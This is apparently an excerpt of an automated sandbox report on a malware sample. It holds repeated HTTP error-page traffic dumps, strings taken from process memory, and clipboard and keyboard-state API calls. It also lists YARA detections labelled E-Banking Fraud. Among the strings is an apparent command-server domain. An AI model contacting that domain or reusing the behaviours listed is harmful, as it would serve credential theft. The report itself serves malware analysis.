30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 07:17:21 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 07:17:40 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 07:17:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 07:17:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Sat, 11 Jan 2025 07:17:47 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 07:18:08 GMT | Server: Apache | Content-Length: 514 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 07:18:10 GMT | Server: Apache | Content-Length: 514 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 07:18:13 GMT | Server: Apache | Content-Length: 514 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 11 Jan 2025 07:18:15 GMT | Server: Apache | Content-Length: 514 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Sat, 11 Jan 2025 07:18:30 GMT | Content-Type: text/html | Content-Length: 166 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Sat, 11 Jan 2025 07:18:33 GMT | Content-Type: text/html | Content-Length: 166 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Sat, 11 Jan 2025 07:18:35 GMT | Content-Type: text/html | Content-Length: 166 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 07:18:38 GMT | Content-Type: text/html | Content-Length: 0 | Connection: close
                Source: tFEgkRNveR.exe, 0000000B.00000002.3136712972.0000000008744000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.zriaraem-skiry.sbs
                Source: tFEgkRNveR.exe, 0000000B.00000002.3136712972.0000000008744000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.zriaraem-skiry.sbs/f8c6/
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tFEgkRNveR.exe, 0000000B.00000002.3133398918.00000000071A2000.00000004.80000000.00040000.00000000.sdmp, winver.exe, 0000000C.00000002.3128888701.00000000059C2000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10332
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000787000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winver.exe, 0000000C.00000003.1869784041.0000000007604000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: tFEgkRNveR.exe, 0000000B.00000002.3133398918.00000000069C8000.00000004.80000000.00040000.00000000.sdmp, winver.exe, 0000000C.00000002.3128888701.00000000051E8000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.bt.cn/?from=404
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: winver.exe, 0000000C.00000003.1879306023.0000000007628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00584164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00583F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0059CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

                Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000B.00000002.3136712972.00000000086F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3127767556.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3128378843.00000000051C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1635438569.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1635938025.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3127852915.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1635105463.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3124391485.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00513B3A This is a third-party compiled AutoIt script.
                Source: z6tNjJC614.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: z6tNjJC614.exe, 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_ec9c5b92-8
